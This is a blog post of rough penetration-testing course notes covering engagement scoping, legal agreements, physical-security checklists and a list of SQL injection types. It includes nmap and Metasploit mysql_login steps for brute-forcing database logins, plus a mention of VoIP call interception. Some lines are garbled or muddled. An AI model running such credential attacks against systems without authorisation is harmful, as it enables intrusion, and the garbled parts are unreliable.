Introduction to Penetration Testing

Introduction to Penetration Testing
Its a post info gathering phase in which we exploit the vulnerabilities discovered in the VA phase.
MOBILE PT – Mobile SF Framework .apk .ipa
Documentation : Digital Security Report

Ethics of Penetration Tester
1. Nothing out of the box in scope
2. You are a hacker not a hero
3. Documentation is for developers not for CEO so make sense.
4. Read the code of conduct and make sure you will not anything which beyond our scope.

Penetration Testing Methodlogies
1. Web Based Pen Testing : Scope + Info Gather + Exploit + Report of remedations +
Applying the patch through company team.
2. Network and Mobile
3. Process or Governence : Read the polcies,contracts,vendor agreements and so on + Find Loopholes in clauses + Report and Identify to high level management+ draft new polciy.

iso 27001 Complaince : Read

Scope Analysis
Step 1: Query for VAPT
Step 2: Scoping document WEB/NETWORK/MOBILE
Step 3: Response Meeting
Step 4: Proposal with Price and MAN per day cost
Step 5: Acceptance and Date to start the project.

Customer and Legal Agreements
-> Code of Conduct Signing
-> NDA – non Disclosure Agreement
-> MOU – Momerendum Of Understand

Pen Testing Planning and Scheduling

VA : Web , Network , Mobile , Complaince

PT : Web , Network , Mobile , Complaince

Date Start : 21st Jan 2016 of Jan 26th Jan 2016

Total Number of Days : 6 Man Days
Green Zone : 2 3 Weeks 2 day : Sat Sunday
Night Shift : 8.00PM -> Monday 3AM Close 422 Servers

Sr. Resource : RM RM–> Single point of contact for the client.

Pre Pen Testing Checklist
1. License Requirements ????
2. List of tools to be used in the testing
3. Team Listing and Tracking

Types of Pen Testing
-> Internal : Network Pentesting and Internal Application Layer Pentesting inside which we try to audit and test all network assests of the organisation along with all in house web applications which runs on the network communication.

-> External : Web Application Testing + Pen testing through a company VPN.

-> White Box : Scope is clear, what os is running on each machines, open port details, service pack details , kernal details, critical or non critical details, version of services details and so on, application source code visibility etc etc.

-> Grey Box : List of IP addresses in terms of network PT and Host name details thats all. In web subdomain names and thats all.

-> Black Box : Webiste IP List in scope.


Physical Security Penetration Testing
After virtual security auditings major coprorations may not deploy a huge amount and resources to ensure the physical environment is secure. Hence auditing physical security again can be a big task for these organisations.

Major Organisations which need physical Security.
– Nuclear Power Plants
– Space Stations
– Hydrogen Experimental sites
– Data Control Centers
etc etc etc…

Physical Security Check list Areas
1. Organisation Surroundings
2. Ensure the people in the organisation following the physical security rules.
– They must use icards for the authentication
– There must be a log manager of all the in-out activities
– There should be a physical resource person(team) who is monitoring 24*7 the in-out operational work by the employees.
– Reason for the visit should be validated.

Check list for entering the server room.
-> Name of the vistor
-> Company of the visitor
-> Company icard scanned copy.
-> Adhar Card/dl etc
-> Name of Person who is bringing the visitor
-> Company he belongs to
-> ICard number
-> Devices they are carrying
-> Hand over your phone in switched off mode to the gatekeeper
-> Locker Keys will be given back to you.

Within the working space physical security checklist
– Clean Desk policy
– After meeting and after all the chats and plans making, before you leave the office discussion room you have to clear the white board or glass on which you have wrote anything about the task to be executed.
– You have to shredder any document before throwing it in dustbin.

Dumpster Diving : Process in which where hacker sneak into the grabage of any home or organisations and look for something important.

– Make sure people in organisation not write any kind of information on sticky notes and on their desk with marker or pen.

Serious Security Checklist
1. There must be fire extinguisher in all the rooms and places in the organisation.
2. There must an AMC with the fire departmnet company.
3. There must be biometric authentication on server room.
4. There must be cameras inside the server room.
5. Electricity room and generater room should be at seprate locations.

ISO 27001 : Physical Security Control List

Watch Here Red Team Breach:

Database Penetration Testing
1. Authentication Bypass
2. Union Based SQL Injection
3. Blind Based SQL Injection
4. Error Based SQL Injection
5. Time Based SQL Injection
6. Double Query SQL Injection
7. Stacked Query SQL Injection
8. Head Based SQL Injection
9. Second Order SQL Injection
10. Boolean Based SQL Injection
11. XPath Injection
12. LDAP Injection

MS-SQL MYSQL : 5.0.45 Communicaty Edition
My-SQL : 3306

Step 1: Scan the system with nmap and identify the database port and its version.
nmap -A Traget IP

Step 2: Scanning Version : mysql_version
Step 3: info
Step 4: Set RHOSTS <IP address>
Step 5: run
Step 6:use auxiliary/scanner/mysql/mysql_login
Step 7: set USER_FILE root/Desktop/usernames.lst
Step 8: set PASS_FILE root/Desktop/passwords.lst
Step 9: run

VOIP Pentesting : Voice Over Internet Protocol.
ITs a process in which we try to sniff the voice packets and conversations with in the organisation in which certain VOIP devices are being used for internal communication.

Aviya : The most trusted brand in VOIP communication*

Put call through VOIP –> Target
Attacker : Intercept via Cain n Abel having SIP intercept facility.

VPN Pentesting
Is to encrypt the packets coming out from devices.

3 comments on “Introduction to Penetration Testing
  1. I found your blog site on google and examine just a few of your early posts. Continue to keep up the superb operate. I simply further up your RSS feed to my MSN Information Reader. Searching for ahead to reading more from you afterward!…

  2. Jada Hegge says:

    Super-Duper site! I am loving it!! Will be back later to read some more. I am bookmarking your feeds also

  3. I am just writing to make you be aware of what a useful encounter our princess undergone using the blog. She picked up numerous things, which include what it’s like to possess a marvelous coaching mindset to get other folks without problems have an understanding of certain multifaceted subject matter. You truly exceeded readers’ desires. Thanks for giving the beneficial, trusted, explanatory as well as easy tips about that topic to Evelyn.

Leave a Reply

Your email address will not be published. Required fields are marked *